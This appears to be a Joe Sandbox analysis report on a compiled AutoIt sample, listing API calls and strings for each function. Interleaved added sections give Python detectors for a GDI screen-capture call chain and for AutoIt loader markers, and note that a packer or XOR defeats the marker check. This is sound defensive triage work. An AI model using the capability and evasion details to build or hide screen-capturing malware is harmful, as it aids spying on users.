                                                          • Opcode ID: 7b8ef178a4923e5802c678400d0c011f1f29d47b4faef8b78fed021d44c88ba4
                                                          • Instruction ID: cc00cb949ac4cb5b2580a33ce40bd0e113a596abac0be22d4886c71011fa5ca5
                                                          • Opcode Fuzzy Hash: 7b8ef178a4923e5802c678400d0c011f1f29d47b4faef8b78fed021d44c88ba4
                                                          • Instruction Fuzzy Hash: 1F61DD71500608BEEB16DF64CC46FBAB7ACEB08710F10811AF915DA1C0DB74AE90CBA0
                                                          APIs
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • CharLowerBuffW.USER32(?,?), ref: 003AA455
                                                          • GetDriveTypeW.KERNEL32 ref: 003AA4A2
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA4EA
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA521
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003AA54F
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: d5ae5724d457c24f0d4a8d0ecc84a1edc35f973a9bd83464b66fc2b4c3fddfd4
                                                          • Instruction ID: 532ec7fde03f894a50c83f54b04a21fdb7f2d1fcb6c2945a717e454c74f9aea4
                                                          • Opcode Fuzzy Hash: d5ae5724d457c24f0d4a8d0ecc84a1edc35f973a9bd83464b66fc2b4c3fddfd4
                                                          • Instruction Fuzzy Hash: 2A514A765047049FC706EF20C89196BB7E8FF89718F00896DF8969B261DB31EE09CB52
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0037E382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0039FC10
                                                          • LoadStringW.USER32(00000000,?,0037E382,00000001), ref: 0039FC19
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0037E382,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0039FC3B
                                                          • LoadStringW.USER32(00000000,?,0037E382,00000001), ref: 0039FC3E
                                                          • __swprintf.LIBCMT ref: 0039FC8E
                                                          • __swprintf.LIBCMT ref: 0039FC9F
                                                          • _wprintf.LIBCMT ref: 0039FD48
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0039FD5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: f12d05aef4d00675e34053ef23628bc1c63367681a91f9ba7a2df0ac187299cd
                                                          • Instruction ID: 425db5103adf57f72f44746b8d50d4a32e9d9818be99f125d7f3fd311df33707
                                                          • Opcode Fuzzy Hash: f12d05aef4d00675e34053ef23628bc1c63367681a91f9ba7a2df0ac187299cd
                                                          • Instruction Fuzzy Hash: 7F410B72804219ABCF16FBE0DD86DEEB7B8AF14700F500165F505BA0A6DB316F59CBA1
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003C9239,?,?), ref: 003CBA8A
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAA1
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAAC
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAB9
                                                          • GlobalLock.KERNEL32(00000000), ref: 003CBAC2
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAD1
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003CBADA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAE1
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003C9239,?,?,00000000,?), ref: 003CBAF2
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,003D2CAC,?), ref: 003CBB0B
                                                          • GlobalFree.KERNEL32(00000000), ref: 003CBB1B
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 003CBB3F
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 003CBB6A
                                                          • DeleteObject.GDI32(00000000), ref: 003CBB92
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003CBBA8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                                          • Instruction ID: b078c1136a3404fcb8a8fae2674faf6703f5a8d55dafed71db763ffb29b5f6c4
                                                          • Opcode Fuzzy Hash: 78f3dae36036702a7d6605aa74f8695ad0b6ed2e66f80fa9f9b0a0a48d813a49
                                                          • Instruction Fuzzy Hash: 29412779600209BFDB129F65DC89EAABBBDFF89711F104068F909D7260D730AD01DB60
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 003ADA9C
                                                          • _wcscat.LIBCMT ref: 003ADAB4
                                                          • _wcscat.LIBCMT ref: 003ADAC6
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003ADADB
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADAEF
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003ADB07
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 003ADB21
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003ADB33
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: 564db50a6c88d97cf47ee55efab9fd90a53378a24d5c87c8bb438b8399c7d6e0
                                                          • Instruction ID: 5b67ae43a9447c12e2691ca6133e6e3ee73b3c663a056cc63f390dc9e7978b45
                                                          • Opcode Fuzzy Hash: 564db50a6c88d97cf47ee55efab9fd90a53378a24d5c87c8bb438b8399c7d6e0
                                                          • Instruction Fuzzy Hash: 4B8182725082409FCB26DF64C84496BB7E8FF8A710F19882EF48ADB651D730ED44CB52
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003CC266
                                                          • GetFocus.USER32 ref: 003CC276
                                                          • GetDlgCtrlID.USER32(00000000), ref: 003CC281
                                                          • _memset.LIBCMT ref: 003CC3AC
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003CC3D7
                                                          • GetMenuItemCount.USER32(?), ref: 003CC3F7
                                                          • GetMenuItemID.USER32(?,00000000), ref: 003CC40A
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003CC43E
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003CC486
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003CC4BE
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003CC4F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 95bc0be6cd7887947ad18710e9bd9930975b3ba6eff56d8c7ad5d704f80aee8e
                                                          • Instruction ID: 7f9952285f2f69eac732dc988ee813b46762fd402462244f24f4e85423828911
                                                          • Opcode Fuzzy Hash: 95bc0be6cd7887947ad18710e9bd9930975b3ba6eff56d8c7ad5d704f80aee8e
                                                          • Instruction Fuzzy Hash: CA817A711183019FDB16DF15D894E6BBBE9EB88314F01992DF999E7291C731EC04CBA2
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 003B74A4
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003B74B0
                                                          • CreateCompatibleDC.GDI32(?), ref: 003B74BC
                                                          • SelectObject.GDI32(00000000,?), ref: 003B74C9
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003B751D
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 003B7559
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003B757D
                                                          • SelectObject.GDI32(00000006,?), ref: 003B7585
                                                          • DeleteObject.GDI32(?), ref: 003B758E
                                                          • DeleteDC.GDI32(00000006), ref: 003B7595
                                                          • ReleaseDC.USER32(00000000,?), ref: 003B75A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 363b25b63105b59f0518319422d80c7aa67c9d96a287af1c7770e301a03df96e
                                                          • Instruction ID: adc203771b1a696c3683d3d81f9bdd064c75c1f4d793b707de1474017cb97114
                                                          • Opcode Fuzzy Hash: 363b25b63105b59f0518319422d80c7aa67c9d96a287af1c7770e301a03df96e
                                                          • Instruction Fuzzy Hash: 21514D75904219EFCB26CFA9CC85EAEBBB9EF48710F14842DFA89D7611D731A940CB50
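The chain listed above (GetDC, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, then release of every handle) is the standard GDI way to copy the screen into a bitmap, which is why a detection engineer treats it as a screen-capture signature. What follows is an added example, not code from Joe Sandbox or from the AutoIt project: it parses call listings in this report's own format and matches the chain as an ordered subsequence with a bounded gap, so a few unrelated calls interleaved by the compiler or the runtime do not defeat the match. GetWindowDC and BitBlt in the pattern, the gap bound of 8, and the sample listing are assumptions and constructions, not taken from the report.

```python
"""Added example: ordered API-sequence matching over a call listing, using the
GDI screen-capture chain from the function above. Not part of the Joe Sandbox
report or of AutoIt itself."""
import re
from typing import List, Optional, Sequence, Set, Tuple

# Parses lines in the report's own listing format, e.g.
#   "• GetDC.USER32(00000000), ref: 003B74A4"
#   "• Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: ..."
#   "• GetFocus.USER32 ref: 003CC276"
TRACE_RE = re.compile(
    r"^\s*[•*\-]?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Za-z0-9_]+)"
)

Call = Tuple[str, str]  # (api name, MODULE)


def parse_trace(lines: Sequence[str]) -> List[Call]:
    """Extract (api, MODULE) pairs; lines that are not API entries are skipped."""
    calls: List[Call] = []
    for line in lines:
        m = TRACE_RE.match(line)
        if m:
            calls.append((m.group(1), m.group(2).upper()))
    return calls


# The screen-capture chain as listed in the report. GetWindowDC and BitBlt are
# assumptions (the page shows only GetDC and StretchBlt); they are the other
# common entry point and blit for the same operation.
SCREEN_CAPTURE: List[Set[str]] = [
    {"GetDC", "GetWindowDC"},
    {"CreateCompatibleBitmap"},
    {"CreateCompatibleDC"},
    {"SelectObject"},
    {"StretchBlt", "BitBlt"},
    {"GetDIBits"},
]


def match_sequence(calls: Sequence[Call], pattern: Sequence[Set[str]],
                   max_gap: int = 8) -> Optional[List[int]]:
    """Ordered-subsequence match with bounded gaps.

    Each step must be satisfied by a call that comes after the call matched by
    the previous step, with at most `max_gap` unrelated calls in between
    (assumed bound). Returns the matched indices, or None if the chain is absent.
    """
    matched: List[int] = []
    pos = 0
    for step in pattern:
        limit = len(calls) if not matched else min(len(calls), pos + max_gap + 1)
        found = next((i for i in range(pos, limit) if calls[i][0] in step), None)
        if found is None:
            return None
        matched.append(found)
        pos = found + 1
    return matched


def captures_screen(lines: Sequence[str]) -> bool:
    """True when the listing contains the screen-capture chain."""
    return match_sequence(parse_trace(lines), SCREEN_CAPTURE) is not None


# Constructed listing (argument columns shortened, no real addresses): one
# unrelated call, the chain from the report, and the handle release.
SAMPLE_LISTING = [
    "• Sleep.KERNEL32(0000000A)",
    "• GetDC.USER32(00000000)",
    "• CreateCompatibleBitmap.GDI32(00000000,00000007,?)",
    "• CreateCompatibleDC.GDI32(?)",
    "• SelectObject.GDI32(00000000,?)",
    "• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020)",
    "• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000)",
    "• ReleaseDC.USER32(00000000,?)",
]

if __name__ == "__main__":
    print(match_sequence(parse_trace(SAMPLE_LISTING), SCREEN_CAPTURE))
```

The listing in the report is static (the `ref:` values are code addresses inside the AutoIt runtime), so a hit on it only says the runtime has the capability; run the same matcher over a dynamic API trace of the process and a hit says the capability was exercised. Keep the gap bound small: widening it trades fewer misses for more coincidental matches on ordinary GUI code that happens to touch the same GDI functions.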
                                                          APIs
                                                            • Part of subcall function 00360AD7: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00346C6C,?,00008000), ref: 00360AF3
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346D0D
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00346E5A
                                                            • Part of subcall function 003459CD: _wcscpy.LIBCMT ref: 00345A05
                                                            • Part of subcall function 003637BD: _iswctype.LIBCMT ref: 003637C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-1018226102
                                                          • Opcode ID: dfbe30e02e1e02373a70928b5035076830fe1583c227ee08fa8376df394393c1
                                                          • Instruction ID: 86dcb3e77eea7ec814dc8cdad51928abb5570c8094b3e5405997b58c68d2d1b6
                                                          • Opcode Fuzzy Hash: dfbe30e02e1e02373a70928b5035076830fe1583c227ee08fa8376df394393c1
                                                          • Instruction Fuzzy Hash: 5D026E315083419FC726EF24C881AAFBBE5EF99314F04491DF4999B2A2DB34E949CB53
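The function above is the AutoIt3 runtime's script loader, and its string table carries the markers it looks for when it unpacks the embedded script ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<") alongside the loader's own error messages; this is what the report's "Binary is likely a compiled AutoIt script file" signature rests on. The scanner below is an added example, not code from Joe Sandbox or from the AutoIt project: it searches a byte blob for those markers so a triage script can flag AutoIt-wrapped samples before they reach dynamic analysis. Two points are assumptions rather than facts from the report, which lists the strings separately: that "AU3!" is immediately followed by the "EA06" subtype tag in a compiled binary, and that the banner may be stored as UTF-16LE (the runtime is a Unicode build, as the ...W API calls show). The sample buffers are constructed.

```python
"""Added example: scan a byte blob for the markers the AutoIt3 script loader
uses. Not part of the Joe Sandbox report or of AutoIt itself."""
from typing import Dict, List

# Marker strings as they appear in the loader function's string table above.
# Assumption: the banner may be stored as UTF-16LE, so both encodings are searched.
MARKERS: Dict[str, List[bytes]] = {
    "script_banner": [b">>>AUTOIT SCRIPT<<<",
                      ">>>AUTOIT SCRIPT<<<".encode("utf-16le")],
    "au3_magic": [b"AU3!"],
    "au3_subtype": [b"EA06"],
}


def find_markers(blob: bytes) -> Dict[str, List[int]]:
    """Return, for every marker, the sorted list of offsets where it occurs."""
    hits: Dict[str, List[int]] = {}
    for name, patterns in MARKERS.items():
        offsets: List[int] = []
        for pat in patterns:
            start = 0
            while (i := blob.find(pat, start)) >= 0:
                offsets.append(i)
                start = i + 1
        hits[name] = sorted(offsets)
    return hits


def looks_like_compiled_autoit(blob: bytes) -> bool:
    """Heuristic verdict.

    True when 'AU3!' is immediately followed by the 'EA06' subtype tag
    (assumption: adjacency is the usual layout; the report only shows the two
    strings separately) or when the script banner is present at all.
    """
    hits = find_markers(blob)
    adjacent = any(blob[i + 4:i + 8] == b"EA06" for i in hits["au3_magic"])
    return adjacent or bool(hits["script_banner"])


# Constructed sample inputs (not real files): a stub PE-like prefix, padding,
# an 'AU3!EA06' header and a UTF-16LE banner; and a blob with nothing of note.
SAMPLE_AUTOIT = (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 100
                 + b"AU3!EA06" + b"\x00" * 16
                 + ">>>AUTOIT SCRIPT<<<".encode("utf-16le"))
SAMPLE_PLAIN = b"MZ" + b"\x00" * 200


if __name__ == "__main__":
    for label, blob in (("autoit", SAMPLE_AUTOIT), ("plain", SAMPLE_PLAIN)):
        print(label, looks_like_compiled_autoit(blob), find_markers(blob))
```

Read a hit as "unpack and read the script", not as "malicious": the strings live in the runtime's own loader function, so every AutoIt-built executable, benign or not, carries them. The markers are plain constants, so a packer or a single-byte XOR over the resource defeats this check; in that case the next stop is the unpacked memory dump the report links above, where the runtime has already decoded the script.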
                                                          APIs
                                                          • _memset.LIBCMT ref: 003445F9
                                                          • GetMenuItemCount.USER32(00405890), ref: 0037D6FD
                                                          • GetMenuItemCount.USER32(00405890), ref: 0037D7AD
                                                          • GetCursorPos.USER32(?), ref: 0037D7F1
                                                          • SetForegroundWindow.USER32(00000000), ref: 0037D7FA
                                                          • TrackPopupMenuEx.USER32(00405890,00000000,?,00000000,00000000,00000000), ref: 0037D80D
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0037D819
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 2751501086-0
                                                          • Opcode ID: 8a61fb5a2be4737094b6dcd055db182d3979fcecc2ae24d390372f9748f7e140
                                                          • Instruction ID: 7ad0a07edb60cbf1ef5bc4c89d755309eb3bb942e588c55fe37aab2a3dcbf7f7
                                                          • Opcode Fuzzy Hash: 8a61fb5a2be4737094b6dcd055db182d3979fcecc2ae24d390372f9748f7e140
                                                          • Instruction Fuzzy Hash: 0471D570604205BEEB329F54DC85FAABFB9FF05364F248226F519AA1E0C7B96C10DB50
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003B89EC
                                                          • CoInitialize.OLE32(00000000), ref: 003B8A19
                                                          • CoUninitialize.OLE32 ref: 003B8A23
                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 003B8B23
                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 003B8C50
                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,003D2C0C), ref: 003B8C84
                                                          • CoGetObject.OLE32(?,00000000,003D2C0C,?), ref: 003B8CA7
                                                          • SetErrorMode.KERNEL32(00000000), ref: 003B8CBA
                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003B8D3A
                                                          • VariantClear.OLEAUT32(?), ref: 003B8D4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                          • String ID: ,,=
                                                          • API String ID: 2395222682-2941206825
                                                          • Opcode ID: 9ce0db435eabf8b009d686a8cc906017025e835c43895a4f3b0e6317fa0c0674
                                                          • Instruction ID: 6b1bb5e00a9456fd105464c77bd8459fecd203fdac3b1de7dd72223ea4766382
                                                          • Opcode Fuzzy Hash: 9ce0db435eabf8b009d686a8cc906017025e835c43895a4f3b0e6317fa0c0674
                                                          • Instruction Fuzzy Hash: 27C114B16083059FC702DF64C884A6BBBE9FF88348F04495DF68A9B251DB71ED05CB52
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 994756849ed0d1f926e9352542e0268b92b1d4663f199d77f099f03691094c09
                                                          • Instruction ID: 6e986eea4cab5f09061731460b71ce9a258239b804faa07f3f75679441006b30
                                                          • Opcode Fuzzy Hash: 994756849ed0d1f926e9352542e0268b92b1d4663f199d77f099f03691094c09
                                                          • Instruction Fuzzy Hash: 3541683411428A8BCF2BEF10D891FEE3764AF22300F154459FD519F296DB35ADAADB60
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0037E5F9,00000010,?,Bad directive syntax error,003CF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0039FAF3
                                                          • LoadStringW.USER32(00000000,?,0037E5F9,00000010), ref: 0039FAFA
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • _wprintf.LIBCMT ref: 0039FB2D
                                                          • __swprintf.LIBCMT ref: 0039FB4F
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0039FBBE
                                                          Strings
                                                          Memory Dump Source
